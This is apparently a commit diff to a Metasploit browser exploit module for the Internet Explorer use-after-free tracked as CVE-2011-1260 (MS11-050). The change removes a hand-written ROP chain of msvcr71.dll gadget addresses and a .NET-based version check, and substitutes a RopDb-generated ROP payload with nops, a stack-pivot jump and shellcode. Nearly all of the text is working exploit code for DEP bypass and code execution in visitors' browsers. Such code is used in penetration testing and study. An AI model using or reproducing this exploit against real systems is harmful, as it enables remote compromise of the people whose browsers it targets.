1
- ##
2
- # $Id$
3
- ##
4
-
5
1
##
6
2
# This file is part of the Metasploit Framework and may be subject to
7
3
# redistribution and commercial restrictions. Please see the Metasploit
@@ -15,19 +11,14 @@ class Metasploit3 < Msf::Exploit::Remote
15
11
Rank = NormalRanking
16
12
17
13
include Msf ::Exploit ::Remote ::HttpServer ::HTML
14
+ include Msf ::Exploit ::RopDb
18
15
include Msf ::Exploit ::Remote ::BrowserAutopwn
19
16
autopwn_info ( {
20
17
:ua_name => HttpClients ::IE ,
21
18
:ua_minver => "7.0" ,
22
19
:ua_maxver => "8.0" ,
23
20
:javascript => true ,
24
- :os_name => OperatingSystems ::WINDOWS ,
25
- # If it's IE 8, then we need .net to bypass ASLR
26
- :vuln_test => %Q|
27
- if (window.os_detect && ua_ver_eq(window.os_detect.ua_version, "8")) {
28
- if (/.NET CLR 2\\ .0\\ .50727/.test(navigator.userAgent)){ is_vuln = true }else{ is_vuln = false }
29
- }
30
- | ,
21
+ :os_name => OperatingSystems ::WINDOWS
31
22
} )
32
23
33
24
def initialize ( info = { } )
@@ -46,30 +37,29 @@ def initialize(info={})
46
37
to bypass DEP (Data Execution Prevention).
47
38
} ,
48
39
'License' => MSF_LICENSE ,
49
- 'Version' => "$Revision$" ,
50
40
'Author' =>
51
41
[
52
42
'd0c_s4vage' , #Discovery, poc
53
43
'sinn3r' , #ROP (thx corelanc0d3r), Windows 7
54
- 'bannedit' , #Windows 7
44
+ 'bannedit' #Windows 7
55
45
] ,
56
46
'References' =>
57
47
[
58
48
[ 'CVE' , '2011-1260' ] ,
59
49
[ 'OSVDB' , '72950' ] ,
60
50
[ 'MSB' , 'MS11-050' ] ,
61
- [ 'URL' , 'http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html' ] ,
51
+ [ 'URL' , 'http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html' ]
62
52
] ,
63
53
'DefaultOptions' =>
64
54
{
65
55
'EXITFUNC' => 'process' ,
66
- 'InitialAutoRunScript' => 'migrate -f' ,
56
+ 'InitialAutoRunScript' => 'migrate -f'
67
57
} ,
68
58
'Payload' =>
69
59
{
70
60
'Space' => 500 ,
71
61
'BadChars' => "\x00 \x09 \x0a \x0d '\\ " ,
72
- 'StackAdjustment' => -3500 ,
62
+ 'StackAdjustment' => -3500
73
63
} ,
74
64
'Platform' => 'win' ,
75
65
'Targets' =>
@@ -185,42 +175,16 @@ def on_request_uri(cli, request)
185
175
return
186
176
end
187
177
188
- #In case we're using ROP, initialize it now
189
- code = ''
190
-
191
178
if mytarget [ 'Rop' ]
192
- # !mona -m msvcr71 rop
193
- code = [
194
- 0x7c376402 , # POP EBP # RETN [msvcr71.dll]
195
- 0x7c376402 , # skip 4 bytes [msvcr71.dll]
196
- 0x7c347f97 , # POP EAX # RETN [msvcr71.dll]
197
- 0xfffff800 , # Value to negate, will become 0x00000201 (dwSize)
198
- 0x7c351e05 , # NEG EAX # RETN [msvcr71.dll]
199
- 0x7c354901 , # POP EBX # RETN [msvcr71.dll]
200
- 0xffffffff ,
201
- 0x7c345255 , # INC EBX # FPATAN # RETN [msvcr71.dll]
202
- 0x7c352174 , # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
203
- 0x7c344f87 , # POP EDX # RETN [msvcr71.dll]
204
- 0xffffffc0 , # Value to negate, will become 0x00000040
205
- 0x7c351eb1 , # NEG EDX # RETN [msvcr71.dll]
206
- 0x7c34d201 , # POP ECX # RETN [msvcr71.dll]
207
- 0x7c38b001 , # &Writable location [msvcr71.dll]
208
- 0x7c34b8d7 , # POP EDI # RETN [msvcr71.dll]
209
- 0x7c347f98 , # RETN (ROP NOP) [msvcr71.dll]
210
- 0x7c364802 , # POP ESI # RETN [msvcr71.dll]
211
- 0x7c3415a2 , # JMP [EAX] [msvcr71.dll]
212
- 0x7c347f97 , # POP EAX # RETN [msvcr71.dll]
213
- 0x7c37a151 , # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
214
- 0x7c378c81 , # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
215
- 0x7c345c30 , # ptr to 'push esp # ret ' [msvcr71.dll]
216
- ] . pack ( "V*" )
217
-
218
- code << "\x90 " *20 #Nops
219
- code << "\xeb \x04 \xff \xff " #Jmp over the pivot
220
- code << [ mytarget . ret ] . pack ( 'V' ) #Stack pivot
179
+ p = make_nops ( 44 ) #Nops
180
+ p << "\xeb \x04 \xff \xff " #Jmp over the pivot
181
+ p << [ mytarget . ret ] . pack ( 'V' ) #Stack pivot
182
+ p << payload . encoded
183
+
184
+ rop_payload = generate_rop_payload ( 'java' , p )
221
185
end
222
186
223
- code << payload . encoded
187
+ code = ( rop_payload ) ? rop_payload : payload . encoded
224
188
225
189
# fill the vtable
226
190
vtable = [ mytarget [ 'TargetAddr' ] ] . pack ( 'V*' )
0 commit comments